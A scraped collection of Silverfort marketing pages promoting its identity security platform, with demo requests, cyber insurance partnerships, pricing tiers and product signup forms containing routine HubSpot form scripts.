systems, commonly leveraged by attackers for lateral movement and remote... --- # # Detailed Content ## Pages - Published: 2025-08-15 - Modified: 2025-08-15 - URL: https://www.silverfort.com/request-a-demo-v3/ Secure every identity. Stop identity threats—inline. We found a way. From legacy to cloud, discover and protect every identity. See how Silverfort: Finds and protects service accounts & NHIs Helps you securely innovate and adopt AI Contains attackers, reduces IR times & cost Secures your Active Directory Book your demo We did a demo and POC and our jaws dropped. We wondered where this has been all our lives. We knew we needed Silverfort. Janusz Wreba-Jaworski Cyber Security Manager | Womble Bond Dickinson Silverfort was able to protect what no one else can. There were no solutions that we looked at that were as comprehensive. Tom Parker VP of IT & CISO | Kayak Silverfort’s innovative solution simplifies this process without system modifications, saving time and money. William Woo Group CIO | Singtel Rated 4. 8 on Gartner Peer Insights We did a demo and our jaws dropped We did a demo and POC—and our jaws dropped. We were left wondering where this has been all our lives. We knew we absolutely needed Silverfort to fit our identity security needs. Janusz Wreba-Jaworski Cyber Security Manager | Womble Bond Dickinson Silverfort was able to protect what no one else can There were no solutions that we looked at that were as comprehensive. Of the security tools that we use, Silverfort has a very high return on investment. " Tom Parker VP of IT & CISO | Kayak No system modifications, saving time and money "Silverfort’s innovative solution simplifies this process without system modifications, saving time and money. " William Woo Group CIO | Singtel Rated 4. 8 on Gartner Peer Insights Book a 30-minute demo See Silverfort in action Recognized by the industry Fast Company's Most Innovative Companies 2025 Fortune Top 50 Cybersecurity Companies 2025 2024 Microsoft Partner of the year Fast Company's Most Innovative Companies 2025 Fortune Top 50 Cybersecurity Companies 2025 2024 Microsoft Partner of the year Recognized by the industry Fast Company's Most Innovative Companies 2025 Fortune Top 50 Cybersecurity Companies 2025 2024 Microsoft Partner of the year Fast Company's Most Innovative Companies 2025 Fortune Top 50 Cybersecurity Companies 2025 2024 Microsoft Partner of the year Why choose the Silverfort Identity Security Platform 10B Authentications analyzed and protected everyday. 34K Real identity exposures & threats detected on average per customer. 17x Faster deployment compared to traditional solutions on average. Convinced yet? Let's chat. Book your 30-minute demo --- - Published: 2025-08-14 - Modified: 2025-08-18 - URL: https://www.silverfort.com/cyber-insurance-partner-ecosystem/cyber-insurance-partner-ecosystem-wtw/ Silverfort's Cyber Insurance Ecosystem WTW | Willis Willis, a WTW business, is a global leader in advisory, broking and solutions. Our comprehensive cyber risk approach assesses exposures, quantifies potential losses and optimizes risk transfer strategies to help clients protect and grow their businesses effectively. How Silverfort and Willis work together Willis proudly partners with Silverfort to deliver market-leading risk services and cost-effective solutions. Together, we help organizations strengthen their defenses and mitigate threats before incidents occur, ensuring resilience and peace of mind in a rapidly evolving threat landscape. Contact us to get started Exclusively for WTW clients Get a free identity security assessment with Silverfort Silverfort’s free identity security assessment can help WTW clients discover and resolve gaps in their MFA and privileged access protection and help to discover and secure service accounts. Get started Learn more about cyber insurance compliance with Silverfort --- - Published: 2025-08-08 - Modified: 2025-08-15 - URL: https://www.silverfort.com/request-a-demo-v2/ Book a 30-minute demo Protect every identity. Stop identity threats—inline. We found a way. See how Silverfort discovers every identity, finds & fixes weaknesses, and preemptively enforces protection at runtime—with rapid deployment and no modifications to existing systems. Book your demo We did a demo and POC—and our jaws dropped. We were left wondering where this has been all our lives. We knew we absolutely needed Silverfort to fit our identity security needs. Janusz Wreba-Jaworski Cyber Security Manager | Womble Bond Dickinson Silverfort was able to protect what no one else can. There were no solutions that we looked at that were as comprehensive. Of the security tools that we use, Silverfort has a very high return on investment. Tom Parker VP of IT & CISO | Kayak Silverfort’s innovative solution simplifies this process without system modifications, saving time and money. William Woo Group CIO | Singtel Rated 4. 8 on Gartner Peer Insights We did a demo and our jaws dropped We did a demo and POC—and our jaws dropped. We were left wondering where this has been all our lives. We knew we absolutely needed Silverfort to fit our identity security needs. Janusz Wreba-Jaworski Cyber Security Manager | Womble Bond Dickinson Silverfort was able to protect what no one else can There were no solutions that we looked at that were as comprehensive. Of the security tools that we use, Silverfort has a very high return on investment. " Tom Parker VP of IT & CISO | Kayak No system modifications, saving time and money "Silverfort’s innovative solution simplifies this process without system modifications, saving time and money. " William Woo Group CIO | Singtel Rated 4. 8 on Gartner Peer Insights See Silverfort in action Recognized by the industry Fast Company's Most Innovative Companies 2025 Fortune Top 50 Cybersecurity Companies 2025 2024 Microsoft Partner of the year Fast Company's Most Innovative Companies 2025 Fortune Top 50 Cybersecurity Companies 2025 2024 Microsoft Partner of the year Recognized by the industry Fast Company's Most Innovative Companies 2025 Fortune Top 50 Cybersecurity Companies 2025 2024 Microsoft Partner of the year Fast Company's Most Innovative Companies 2025 Fortune Top 50 Cybersecurity Companies 2025 2024 Microsoft Partner of the year Why choose the Silverfort Identity Security Platform 10B Authentications analyzed and protected everyday. 34K Real identity exposures & threats detected on average per customer. 17x Faster deployment compared to traditional solutions on average. Convinced yet? Let's chat. Book your 30-minute demo --- - Published: 2025-08-07 - Modified: 2025-08-07 - URL: https://www.silverfort.com/cyber-insurance-free-assessment-insurance-partner/ GET A FREE IDENTITY SECURITY ASSESSMENT Identify the MFA and privileged access protection gaps you must resolve to qualify for a cyber insurance policy Silverfort’s free assessment enables you to identify and address all the identity protection issues in your environment so you can meet your insurer’s requirements: Administrative users that require MFA protection Service accounts’ inventory, privileges, and activities Identity protection hygiene issues and exposed attack surfaces  Active identity threats that take place in your environment  --- - Published: 2025-08-05 - Modified: 2025-08-05 - URL: https://www.silverfort.com/cyber-insurance-partner-ecosystem/sompo/ Silverfort's Cyber Insurance Ecosystem Sompo Sompo is a global provider of commercial and consumer property, casualty, and specialty insurance and reinsurance. Building on the 135 years of innovation of our parent company, Sompo Holdings, Inc. , Sompo employs approximately 9,500 people around the world who use their and expertise to help simplify and resolve your complex challenges. How Silverfort and Sompo work together Sompo insureds qualify for large discounts toward new Silverfort licensing over the duration of the policy term. Primary insureds qualify to have Sompo share the expense of Silverfort licenses, making Sompo a committed partner. Additional terms apply. Contact us to get started Learn more about cyber insurance compliance with Silverfort --- - Published: 2025-08-05 - Modified: 2025-08-05 - URL: https://www.silverfort.com/cyber-insurance-partner-ecosystem/crum-and-forster/ Silverfort's Cyber Insurance Ecosystem Crum & Forster Crum & Forster (C&F) is a leading national property, casualty, and accident & health insurer, providing specialty insurance products through its admitted and surplus lines insurance companies. The company has a 200-year history, dating back to 1822, and is known for its expertise, integrity, and disciplined approach to risk management. How Silverfort and Crum & Forster work together C&F’s partnership with Silverfort allows our policy holders to take advantage of a free Identity Risk Assessment* and special discounts for Silverfort solutions. *Free Identity Risk Assessment is only available for insureds who have 250 identities or more within their environment. Contact us to get started Exclusively for C&F clients Get a free identity security assessment with Silverfort Silverfort’s free identity security assessment can help C&F clients discover and resolve gaps in their MFA and privileged access protection and help to discover and secure service accounts. Get started Learn more about cyber insurance compliance with Silverfort --- - Published: 2025-08-04 - Modified: 2025-08-21 - URL: https://www.silverfort.com/mtny-3/ The identity security platform Secure every dimension of identity, everywhere. Discover exposures, enforce identity security controls, and stop attacks before they cause damage—all from a single platform. No modifications or lengthy deployments. Just identity security done right. Privileged Access Security Non-Human Identity Security Service Account Visibility & Protection Universal MFA Identity Threat Detection & Response Identity Security Posture Management AI Agent Security Get a demo or Take a platform tour The identity security platform Secure every dimension of identity, everywhere. Discover exposures, enforce identity security controls, and stop attacks before they cause damage—all from a single platform. No modifications or lengthy deployments. Just identity security done right. Privileged Access Security Non-Human Identity Security Service Account Visibility & Protection Universal MFA Identity Threat Detection & Response Identity Security Posture Management AI Agent Security Get a demo or Take a platform tour --- - Published: 2025-08-04 - Modified: 2025-08-21 - URL: https://www.silverfort.com/mtny3/ The identity security platform Secure every identity. Human, AI, and machine. Cloud and on-prem. Discover what others miss. Control what others can’t. Secure every identity—in real time, from one platform. Fix hidden risks, close unmanaged access paths, and proactively enforce security policies at scale. Silverfort helps you: Get visibility into hybrid environments Retrofit your legacy systems with MFA Stop attacks & block lateral movement Discover & protect service accounts & NHIs Protect privileged access at scale Contain an active breach Protect every AD asset Securely innovate & adopt AI Trusted by 1,000+ organizations around the world. Rated 4. 8 on Gartner Peer Insights The # 1 attack Surface Identity is where your current security tools end and every attack begins. IAM security controls only work within their own silos, leaving critical gaps. Too many systems and resources are left exposed and unprotected, creating countless security blind spots. Why Silverfort The Silverfort identity security platform Secure your entire IAM infrastructure from within. We found a way to bring identity security to every corner of your environment. Our Runtime Access Protection (RAP) technology integrates seamlessly with your IAM infrastructure to protect all identities, all environments, and all resources—all the time. End-to-end Identity protection for on-prem, cloud, humans and machines. Protect the unprotectable Including systems that no other solution can cover. Zero changes To your systems, minimizing disruptions and cost. Discover the platform or Take a platform tour Where’s the gap in your identity defense? Privileged Access Security NHI Security Universal MFA Authentication Firewall ITDR ISPM AI Agent Security Where’s the gap in your identity defense? Privileged Access Security Privileged Access Security (PAS) Go beyond managing privileged accounts NHI Security Non-Human Identity (NHI) Security Discover and protect non-human identities Universal MFA Universal MFA Extend multi-factor authentication to any system Authentication Firewall Authentication Firewall Stop unauthorized access with Zero Trust policies ITDR Identity Threat Detection
& Response Detect and respond to attacks in real time ISPM Identity Security Posture Management Uncover, map and analyze identity security exposures AI Agent Security AI Agent Security Govern, monitor and protect your AI agents Proven technology Trusted by 1,000+ organizations. Identity security is the heart of our mission. We build true partnerships with our customers to take identity security further. The results speak for themselves. Hear from our customers Proven technology Trusted by 1,000+ organizations. Identity security is the heart of our mission. We build true partnerships with our customers to achieve it together. "Silverfort is able to protect what no one else can. There were no solutions that we looked at that were as comprehensive. Of the security tools that we use, Silverfort has a very high return on investment. " Tom ParkerVP of IT & CISO | Kayak "We did a demo and POC—and our jaws dropped. We were left wondering where this has been all our lives. We knew we absolutely needed this to fit our identity security needs. " Janusz Wreba-JaworskiCyber Security Manager | Womble Bond Dickinson "Many large enterprises find it difficult to implement secure employee authentication across all their environments. Silverfort’s innovative solution simplifies this process without system modifications, saving time and money. " William WooGroup CIO | Singtel “With the help of Silverfort, we were able to fill a critical gap in our identity security, which was key for our overall security posture. ” Katie McMillanInformation Security Manager | Agilisys Latest blogs Explore our blog --- - Published: 2025-08-04 - Modified: 2025-08-21 - URL: https://www.silverfort.com/mtny5/ The identity security platform you deserve Need to comply with security regulations? stop lateral movement? complete your PAM deployment? adopt AI quickly and securely? get cyber insurance? pass an audit? resolve a security incident? find and secure your NHIs? We discover and protect every dimension of identity, everywhere—human, AI, or machine, cloud or on-prem—so you can get maximum security with minimal effort. One platform, many outcomes. Get a demo or Take a platform tour Trusted by 1,000+ organizations around the world. Rated 4. 8 on Gartner Peer Insights --- - Published: 2025-07-30 - Modified: 2025-08-21 - URL: https://www.silverfort.com/pricing-v6/ Silverfort Pricing Our pricing is based on the size of your organization. Choose between four packages depending on where your business is on its identity security journey. All packages include Silverfort’s patented Runtime Access Protection for preemptive security controls and Identity Inventory for end-to-end identity observability across your entire identity fabric. Get a quote today Core Includes: Identity Security Posture Management (ISPM) Map identity attack surface Find & fix security exposures Universal MFA Extend MFA to: IT/OT infrastructure Command-line tools Legacy systems & more Get a quote Plus Everything in Core, and: Service Account Visibility Discover all service accounts Map how & where they are used Service Account Protection Enforce virtual fencing policies Prevent unauthorized access Integrate with other IT tools to manage lifecycle automatically Get a quote Advanced Everything in Plus, and: Authentication Firewall Prevent lateral movement Identity-based segmentation Zero Trust access control Identity Threat Detection & Response (ITDR) Detect identity threats in real time Automated inline response Integrate with XDR and SIEM Get a quote Enterprise Everything in Advanced, and: Access Analysis Enable Least Privilege at scale Understand which users access which resources Privileged Access Security (PAS) Privileged account discovery Virtual fencing & access control Just-In-Time (JIT) access Get a quote Compare our packages SILVERFORT A LA CARTE Build your own package Browse our individual platform capabilities to customize your package. Browse our catalog Compare our pricing packages Scroll sideways Core Plus Advanced Enterprise The Silverfort Platform and standard support services are included in all packages Identity Security Posture Management (ISPM) Uncover, map and analyze identity security exposures Universal Multi-Factor Authentication (MFA) Enable MFA for any resource, including 'unprotectable' systems Service Account Visibility Discover and analyse every service account, even unknowns Service Account Protection Restrict service account access to their intended purpose only Authentication Firewall Boost your resilience with identity-based Zero Trust policies Identity Threat Detection & Response (ITDR) Detect and respond to attacks in real time Access Analysis Understand which users access which resources, at scale Privileged Access Security (PAS) Secure your privileged accounts—in a few clicks Cloud Non-Human Identity (NHI) Security Find, monitor, and secure every cloud-based NHI Implementation & Support Services Standard Included Premier 10% to license cost Diamond 20% to license cost Silverfort Expert Services Identity Security Services (threat hunting & incident response), Silverfort Resident Expert (staff augmentation) and more. Available upon request from Silverfort or selected partners. Get a personalized quote Complete this form and a member of our team will be in touch to discuss Silverfort Pricing Our pricing is based on the number of users. Customers can choose between three simple packages—see details below. All packages include the Silverfort platform infrastructure, delivered as on-prem VMs or SaaS. To request a quote, schedule a quick call with our team. Get a quote Silverfort Essential Reduce your identity attack surface, detect & respond to identity-based attacks in real-time, and gain visibility across all IAM silos. Silverfort Pro Move beyond visibility into real-time enforcement and active protection. Focus on your most sensitive users to address your top security and compliance gaps. Silverfort Unified Gain end-to-end visibility and real-time enforcement for all identities – human and non-human, privileged and non-privileged – to stop identity threats everywhere. Scroll sideways Silverfort Essential Silverfort Pro Silverfort Unified Identity Observability Identity Security Posture Management (ISPM) Uncover, map and analyze identity security exposures Identity Threat Detection and Response (ITDR) Detect and respond to attacks in real-time Identity Protection Universal MFA Extend Multi-Factor Authentication to any system, including ones that couldn’t be protected before 10% of company size Non-Human Identity (NHI) Security Discover, monitor and protect Non-Human Identities 10% of company size Authentication Firewall Stop unauthorized access with Zero Trust policies 10% of company size Privileged Access Security (PAS) New Discover privileged accounts and enforce Least Privilege and Just-In-Time (JIT) access Optional add-on on top of any chosen package. Priced per protected privileged user. Implementation & Support Services Standard included Premier 10% to license cost Diamond 20% to license cost Silverfort Expert Services Identity Security Services (threat hunting & incident response), Silverfort Resident Expert (staff augmentation) and more—available upon request, from Silverfort or selected partners. Get a personalized quote Complete this form and a member of our team will be in touch to discuss --- - Published: 2025-07-28 - Modified: 2025-08-13 - URL: https://www.silverfort.com/nhi-protection-signup/ Non-Human Identity Security starts here Silverfort delivers end-to-end protection for both human and non-human identities across cloud, on-prem, and hybrid environments. From AD service accounts to cloud-based NHIs like tokens and keys, Silverfort eliminates fragmented tools and silos, providing unified security through a single platform. Protect every identity from misuse, compromise, and lateral movement. Automatically discover and analyze all identities in your environment, enforce real-time access controls, and apply “Virtual Fencing” to ensure service accounts can’t be exploited—even if credentials are compromised. Get access window. hsFormsOnReady = window. hsFormsOnReady || ; window. hsFormsOnReady. push(function { hbspt. forms. create({ portalId: "4711332", formId: "ff6b55d2-d2b5-4e08-97d8-95633fed490b", target: "#hbspt-form-ff6b55d2-d2b5-4e08-97d8-95633fed490b", region: "na1" }); }); // Function to display a "Thank you" message after form submission function displayThankYouMessage { setTimeout(function { // Create a thank you message element var thankYouMessage = document. createElement("p"); thankYouMessage. textContent = "Thank you for connecting with us! Redirecting... "; thankYouMessage. style. color = "green"; thankYouMessage. style. fontSize = "18px"; thankYouMessage. style. marginTop = "20px"; // Append the message to the form container var formContainer = document. querySelector("#hbspt-form-ff6b55d2-d2b5-4e08-97d8-95633fed490b"); if (formContainer) { formContainer. appendChild(thankYouMessage); } }, 2000); // 2-second delay } Only Silverfort delivers end-to-end NHI security across on-prem and cloud. Protect both on-prem service accounts and cloud NHIs from a single platform, instead of relying on silos and point solutions. Classify and prioritize Uncover the different types of NHIs and their behavior to build a protection roadmap that aligns with your needs. Discover every NHI See all the NHIs in your environments, with granular insights into their activities, risk indicators and usage patterns. Scale NHI security Seamlessly secure all your NHIs across cloud and on-prem environments. Learn more about our platform --- - Published: 2025-07-28 - Modified: 2025-08-13 - URL: https://www.silverfort.com/nhi-signup/ Secure Your Non-Human Identities with Silverfort Gain complete visibility and control over non-human identities (NHIs) across your on-prem and cloud environments—ensuring every service account, script, and automated process is fully secured. Continuously discover and monitor all NHIs in your hybrid infrastructure to eliminate blind spots and unmanaged access risks. Enforce least privilege access, block lateral movement, and extend security controls to all identities without the operational overhead of password rotation or infrastructure changes. Get access window. hsFormsOnReady = window. hsFormsOnReady || ; window. hsFormsOnReady. push(function { hbspt. forms. create({ portalId: "4711332", formId: "74279c78-c18d-4b4a-8998-44b2b44eca57", target: "#hbspt-form-74279c78-c18d-4b4a-8998-44b2b44eca57", region: "na1" }); }); // Function to display a "Thank you" message after form submission function displayThankYouMessage { setTimeout(function { // Create a thank you message element var thankYouMessage = document. createElement("p"); thankYouMessage. textContent = "Thank you for connecting with us! Redirecting... "; thankYouMessage. style. color = "green"; thankYouMessage. style. fontSize = "18px"; thankYouMessage. style. marginTop = "20px"; // Append the message to the form container var formContainer = document. querySelector("#hbspt-form-74279c78-c18d-4b4a-8998-44b2b44eca57"); if (formContainer) { formContainer. appendChild(thankYouMessage); } }, 2000); // 2-second delay } NHI journey: from visibility to comprehensive security. Discover, monitor, and protect all non-human identities in your hybrid environment at scale, without requiring password rotation. Automated discovery Gain visibility into your entire NHI inventory, including name, privilege level, security posture, sources and destinations of every account, so you can effectively prioritize. Real-time protection Activate an auto-generated policy that allows the account to access its standard sources and destinations, and triggers access block or alert when it deviates from its normal behavior. Effortless to scale Group all the accounts you want to protect under a single policy, continue adding accounts until all are protected, and integrate with your app management tool for ease of use. Learn more about our platform --- - Published: 2025-07-28 - Modified: 2025-08-13 - URL: https://www.silverfort.com/mfa-firewall-signup/ One identity security platform. Total access control. Silverfort brings together the power of Universal MFA and Authentication Firewall in one integrated platform to secure all identities and resources. Prevent unauthorized access and enforce adaptive policies—without deploying proxies or agents. From MFA on legacy systems to dynamic access controls based on risk, Silverfort protects your entire identity infrastructure from within. Get access window. hsFormsOnReady = window. hsFormsOnReady || ; window. hsFormsOnReady. push(function { hbspt. forms. create({ portalId: "4711332", formId: "29701f93-a936-41f4-ae94-0a08a79134fd", target: "#hbspt-form-29701f93-a936-41f4-ae94-0a08a79134fd", region: "na1" }); }); // Function to display a "Thank you" message after form submission function displayThankYouMessage { setTimeout(function { // Create a thank you message element var thankYouMessage = document. createElement("p"); thankYouMessage. textContent = "Thank you for connecting with us! Redirecting... "; thankYouMessage. style. color = "green"; thankYouMessage. style. fontSize = "18px"; thankYouMessage. style. marginTop = "20px"; // Append the message to the form container var formContainer = document. querySelector("#hbspt-form-29701f93-a936-41f4-ae94-0a08a79134fd"); if (formContainer) { formContainer. appendChild(thankYouMessage); } }, 2000); // 2-second delay } One platform. Every identity. Full coverage. Protect every identity across every protocol and environment. Unified protection Enforce MFA and access control everywhere with a single platform and policy engine. Real-time enforcement with zero disruption Apply risk-based policies to every authentication attempt without the need to modify or change your environment. End-to-end coverage across legacy and cloud Extend identity protection to the systems that traditional solutions can’t reach. Learn more about our platform --- - Published: 2025-07-28 - Modified: 2025-08-13 - URL: https://www.silverfort.com/mfa-signup/ Enforce MFA without the limits Silverfort's Universal MFA secures every resource, whether it's on-prem, legacy or cloud. No need to change your infrastructure or user workflows. It extends protection to all AD authentication protocols, including Kerberos, NTLM, and LDAP. Use Silverfort as your only MFA provider or extend it to cover the blind spots by your current MFA solutions to protect all your workforce with a consistent user experience across all resource access. Get access window. hsFormsOnReady = window. hsFormsOnReady || ; window. hsFormsOnReady. push(function { hbspt. forms. create({ portalId: "4711332", formId: "c59bdd86-9361-40ce-a9e0-1ff492459199", target: "#hbspt-form-c59bdd86-9361-40ce-a9e0-1ff492459199", region: "na1" }); }); // Function to display a "Thank you" message after form submission function displayThankYouMessage { setTimeout(function { // Create a thank you message element var thankYouMessage = document. createElement("p"); thankYouMessage. textContent = "Thank you for connecting with us! Redirecting... "; thankYouMessage. style. color = "green"; thankYouMessage. style. fontSize = "18px"; thankYouMessage. style. marginTop = "20px"; // Append the message to the form container var formContainer = document. querySelector("#hbspt-form-c59bdd86-9361-40ce-a9e0-1ff492459199"); if (formContainer) { formContainer. appendChild(thankYouMessage); } }, 2000); // 2-second delay } Your MFA, anywhere it's needed Secure your identity layer and extend MFA to any system, interface or protocol without proxies or agents Universal MFA for AD & legacy apps Protect all your critical resources, including file shares, command-line interfaces, and admin tools without any modifications required. Plug-and-play with your current MFA Extend the MFA solution you already use across your hybrid infrastructure without disrupting user experience. Risk-based enforcement Combine static policies with contextual risk insights to trigger MFA only when it matters most. Learn more about our platform --- - Published: 2025-07-28 - Modified: 2025-08-13 - URL: https://www.silverfort.com/firewall-signup/ Put identity at the center of access control Silverfort’s Authentication Firewall enforces granular, identity-based access policies across your hybrid AD environment. Segment access, reduce lateral movement risk, and eliminate legacy authentication blind spots. IAM and security teams can implement or revoke access in real time, without re-architecting their environment or compromising agility. Get access window. hsFormsOnReady = window. hsFormsOnReady || ; window. hsFormsOnReady. push(function { hbspt. forms. create({ portalId: "4711332", formId: "795f67ca-752b-456f-ba49-7376abc9c9bf", target: "#hbspt-form-795f67ca-752b-456f-ba49-7376abc9c9bf", region: "na1" }); }); // Function to display a "Thank you" message after form submission function displayThankYouMessage { setTimeout(function { // Create a thank you message element var thankYouMessage = document. createElement("p"); thankYouMessage. textContent = "Thank you for connecting with us! Redirecting... "; thankYouMessage. style. color = "green"; thankYouMessage. style. fontSize = "18px"; thankYouMessage. style. marginTop = "20px"; // Append the message to the form container var formContainer = document. querySelector("#hbspt-form-795f67ca-752b-456f-ba49-7376abc9c9bf"); if (formContainer) { formContainer. appendChild(thankYouMessage); } }, 2000); // 2-second delay } Real-time identity segmentation. Define access policies based on identity, protocol, and behavior. Activate protection in one click. Least privilege enforcement Apply access based policies based on identity and resource attributes, reducing excessive privileges and insider risk. Block threats at first touch Halt lateral movement and deny risky authentication attempts as soon they're detected. Legacy protocol control Disable risky protocols like NTLMv1 and cleartext LDAP without disrupting operations or access. Learn more about our platform --- - Published: 2025-07-28 - Modified: 2025-08-13 - URL: https://www.silverfort.com/cloud-platform-signup/ Your cloud identity security journey starts here Gain visibility and control over every authentication and identity across cloud infrastructure, SaaS apps, and hybrid environments from a single platform. Automatically discover all human and non-human identities (NHIs), including service accounts, access keys, federated users, unmanaged admins, and stale entitlements. Detect risky access behaviors and stop lateral movement, privilege misuse, and identity-based attacks before they happen. Get access window. hsFormsOnReady = window. hsFormsOnReady || ; window. hsFormsOnReady. push(function { hbspt. forms. create({ portalId: "4711332", formId: "324fef08-54e0-4b06-b14f-ea87fc04c282", target: "#hbspt-form-324fef08-54e0-4b06-b14f-ea87fc04c282", region: "na1" }); }); // Function to display a "Thank you" message after form submission function displayThankYouMessage { setTimeout(function { // Create a thank you message element var thankYouMessage = document. createElement("p"); thankYouMessage. textContent = "Thank you for connecting with us! Redirecting... "; thankYouMessage. style. color = "green"; thankYouMessage. style. fontSize = "18px"; thankYouMessage. style. marginTop = "20px"; // Append the message to the form container var formContainer = document. querySelector("#hbspt-form-324fef08-54e0-4b06-b14f-ea87fc04c282"); if (formContainer) { formContainer. appendChild(thankYouMessage); } }, 2000); // 2-second delay } Only Silverfort provides unified identity protection for cloud and on-prem—from legacy to modern, and human to NHI. Enforce real-time access policies across every identity and resource without modifying your cloud enviroments, apps, or writing custom integrations. Unify identity visibility and control Discover all identities across cloud and hybrid, including blind spots like service accounts, SSH access, and outdated protocols. Enforce conditional access for every authentication Apply context-aware MFA and access policies to resources that were previously unprotected — including CLI tools, legacy apps, and database. Stop identity-based threats in real time Detect and block suspicious authentications, compromised credentials, and abnormal access paths before they escalate. Learn more about our platform --- - Published: 2025-07-28 - Modified: 2025-08-13 - URL: https://www.silverfort.com/access-analysis-signup/ Reveal and remediate excessive access at scale Gain end-to-end visibility into how every identity human or non-human accesses resources across your hybrid environment. Map real-time identity-to-application access paths, identify unused or risky entitlements, and uncover hidden exposures that traditional tools fail to detect. With a clear view into actual access behavior, go move beyond static permission reviews and prioritize high-risk access, eliminating excessive privileges, and triggering protection or cleanup actions immediately from a single platform. Get access window. hsFormsOnReady = window. hsFormsOnReady || ; window. hsFormsOnReady. push(function { hbspt. forms. create({ portalId: "4711332", formId: "a55e94fd-c9d6-4ea6-ad9a-b974b3b4461c", target: "#hbspt-form-a55e94fd-c9d6-4ea6-ad9a-b974b3b4461c", region: "na1" }); }); // Function to display a "Thank you" message after form submission function displayThankYouMessage { setTimeout(function { // Create a thank you message element var thankYouMessage = document. createElement("p"); thankYouMessage. textContent = "Thank you for connecting with us! Redirecting... "; thankYouMessage. style. color = "green"; thankYouMessage. style. fontSize = "18px"; thankYouMessage. style. marginTop = "20px"; // Append the message to the form container var formContainer = document. querySelector("#hbspt-form-a55e94fd-c9d6-4ea6-ad9a-b974b3b4461c"); if (formContainer) { formContainer. appendChild(thankYouMessage); } }, 2000); // 2-second delay } Real-time access path mapping Define the full picture of access—not just what’s assigned, but what’s actually used. Understand effective privileges Identify which identities are actually using access—how often, to what resources, and under what conditions. Visibility into real usage and hidden risk Focus your efforts where they matter most by revealing actual authentication activity, privilege usage, and protocol-level exposures. Turn insight into immediate risk reduction Take decisive action on exposed access paths by enforcing MFA, restricting risky authentications, or deactivating unused accounts. Learn more about our platform --- - Published: 2025-07-28 - Modified: 2025-08-13 - URL: https://www.silverfort.com/cloud-access-analysis-signup/ See and secure every cloud access path Modern cloud environments are complex, dynamic, and often invisible to security and IAM teams. Traditional tools focus on static assignments, missing how access is actually granted, inherited, and used. This creates blind spots that attackers exploit. Silverfort’s Cloud Access Analysis delivers real-time visibility into effective access across AWS, Azure, and GCP. It maps how users reach cloud resources, identifies unprotected or unused access, and helps teams clean up entitlements or enforce controls like MFA. Get access window. hsFormsOnReady = window. hsFormsOnReady || ; window. hsFormsOnReady. push(function { hbspt. forms. create({ portalId: "4711332", formId: "5617285a-634d-4b99-8e99-3749273aeef5", target: "#hbspt-form-5617285a-634d-4b99-8e99-3749273aeef5", region: "na1" }); }); // Function to display a "Thank you" message after form submission function displayThankYouMessage { setTimeout(function { // Create a thank you message element var thankYouMessage = document. createElement("p"); thankYouMessage. textContent = "Thank you for connecting with us! Redirecting... "; thankYouMessage. style. color = "green"; thankYouMessage. style. fontSize = "18px"; thankYouMessage. style. marginTop = "20px"; // Append the message to the form container var formContainer = document. querySelector("#hbspt-form-5617285a-634d-4b99-8e99-3749273aeef5"); if (formContainer) { formContainer. appendChild(thankYouMessage); } }, 2000); // 2-second delay } Map cloud access. Reduce risk. Enforce with precision. Continuously analyze identity-to-resource paths across cloud environments and take action on what matters most. Access Path Mapping Across AWS, Azure, and GCP Visualize how users access cloud resources, including group memberships, role assumptions, and privilege inheritance. Effective Privilege Analysis See what users can do, not just what they’re assigned. Prioritize risk by identifying overly broad or unused access. Misconfiguration & Risk Detection Quickly detect dormant privileges, long-lived roles, or missing protections, before they become entry points. Learn more about our platform --- - Published: 2025-07-28 - Modified: 2025-08-13 - URL: https://www.silverfort.com/ai-agents-security-signup/ Unlock AI agent potential, securely Silverfort’s AI Agent Security solution brings human-level visibility to agentic activity. It discovers AI agents operating across your cloud environment, tracks who they belong to, and logs exactly what they do, so your team can audit confidently, detect misconfigurations, and stay in control. Get access window. hsFormsOnReady = window. hsFormsOnReady || ; window. hsFormsOnReady. push(function { hbspt. forms. create({ portalId: "4711332", formId: "9428c2e4-062b-4b17-82c7-bf19d57ec98c", target: "#hbspt-form-9428c2e4-062b-4b17-82c7-bf19d57ec98c", region: "na1" }); }); // Function to display a "Thank you" message after form submission function displayThankYouMessage { setTimeout(function { // Create a thank you message element var thankYouMessage = document. createElement("p"); thankYouMessage. textContent = "Thank you for connecting with us! Redirecting... "; thankYouMessage. style. color = "green"; thankYouMessage. style. fontSize = "18px"; thankYouMessage. style. marginTop = "20px"; // Append the message to the form container var formContainer = document. querySelector("#hbspt-form-9428c2e4-062b-4b17-82c7-bf19d57ec98c"); if (formContainer) { formContainer. appendChild(thankYouMessage); } }, 2000); // 2-second delay } Discover and track agentic activity across your organization Continuously identify, attribute, and monitor AI agents across your environment—no developer effort required. Automated cloud agent discovery Automatically discover AI agents across AWS, Entra ID, and Google Workspace - no code changes or manual tagging required. Ownership & activity attribution Map each agent to the human or system that created or invoked it. Track usage patterns and behavioral context to understand how agents operate. Detect risky or misconfigured AI agents Identify agents with unusual behaviors, such as excessive privileges, long-lived activity, or unclear ownership. Flag them for review. Learn more about our platform --- - Published: 2025-07-23 - Modified: 2025-08-01 - URL: https://www.silverfort.com/pricing/catalog/ Browse our catalog The Silverfort Identity Security Platform forms the basis for all of our packages and includes telemetry, basic reporting, all integrations, and our standard support services. Any capability listed below can be added to the base platform or to one of our existing packages. Get a quote today Core Identity Security Posture Management (ISPM) Find and fix exposures to reduce your identity attack surface. You can't protect what you can't see. Improve your resilience with continuous discovery and mitigation of identity exposures like vulnerable protocols, stale accounts & shadow admins. Learn more Core Universal Multi-Factor Authentication (MFA) Enable MFA for any resource, including 'unprotectable' systems. Solve security and compliance gaps by enabling MFA anywhere. We integrate with Active Directory to extend MFA even to legacy apps, command-line interfaces and OT systems—without modifications. Learn more Plus Service Account Visibility & Protection Discover, analyze and protect all your service accounts. Map and secure every service account in your environment, including unknowns. Drill down into their privilege levels, sources and destinations, discover dependencies, and protect at scale with auto-generated policies. Learn more Advanced Identity Threat Detection and Response (ITDR) Detect and respond to identity threats anywhere, faster. Rapidly detect account takeover, lateral movement, ransomware propagation and more. Leverage unique inline response capabilities to stop threats before they can spread. Learn more Advanced Authentication Firewall Boost your resilience with identity-based Zero Trust policies. Make unauthorized access and lateral movement impossible with an Authentication Firewall that controls access from behind your Active Directory, stopping attacks before they can spread. Learn more Enterprise Access Analysis Understand which users access which resources, at scale. Map all user access automatically, including sources, destinations and frequency. Use our insights to achieve Least Privilege access, assist in app migration projects, and save money by finding unused apps. Coming soon Enterprise Privileged Access Security (PAS) Go beyond managing your privileged accounts. Secure them. Discover and protect privileged accounts rapidly. Our patented technology finds privileged accounts automatically, and enable Least Privilege and Just-In-Time (JIT) access policies without friction. Learn more Add On AI Agent Security Secure your AI agents. 